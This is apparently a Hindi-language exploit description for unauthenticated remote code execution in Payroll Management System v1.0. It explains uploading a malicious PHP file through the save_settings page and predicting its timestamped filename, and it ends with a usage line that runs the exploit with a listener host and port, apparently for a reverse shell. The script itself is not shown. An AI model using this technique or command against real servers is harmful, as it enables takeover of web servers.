
Payroll Management System v1.0 के लिए बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन शोषण, जो टाइमस्टैम्प-आधारित फ़ाइलनाम पूर्वानुमान के साथ दुर्भावनापूर्ण PHP फ़ाइल अपलोड के माध्यम से काम करता है।

फ़ाइल अपलोड के माध्यम से RCE https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html के लिए। फ़ाइल नामों में एक मिनट की सटीकता के साथ टाइमस्टैम्प जोड़ा जाता है। स्क्रिप्ट वर्तमान, पिछले और अगले मिनट के टाइमस्टैम्प का उपयोग करके फ़ाइल नाम का अनुमान लगाने का प्रयास करती है।
Payroll Management System v1.0 उपयोगकर्ताओं को "save_settings" पृष्ठ के माध्यम से छवियाँ अपलोड करने की अनुमति देता है। एक अप्रमाणित हमलावर इस कार्यक्षमता का लाभ उठाकर इसके बजाय एक दुर्भावनापूर्ण PHP फ़ाइल अपलोड कर सकता है। अपलोड की गई फ़ाइलें एक सार्वजनिक रूप से सुलभ फ़ोल्डर में संग्रहीत की जाती हैं और उनके फ़ाइल नामों में मिनट परिशुद्धता के साथ एक टाइमस्टैम्प जोड़ा जाता है, जिसकी आसानी से गणना की जा सकती है। इस भेद्यता के सफल शोषण के परिणामस्वरूप वेब सर्वर चलाने वाले उपयोगकर्ता के रूप में मनमाना कोड निष्पादित करने की क्षमता प्राप्त होती है।
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
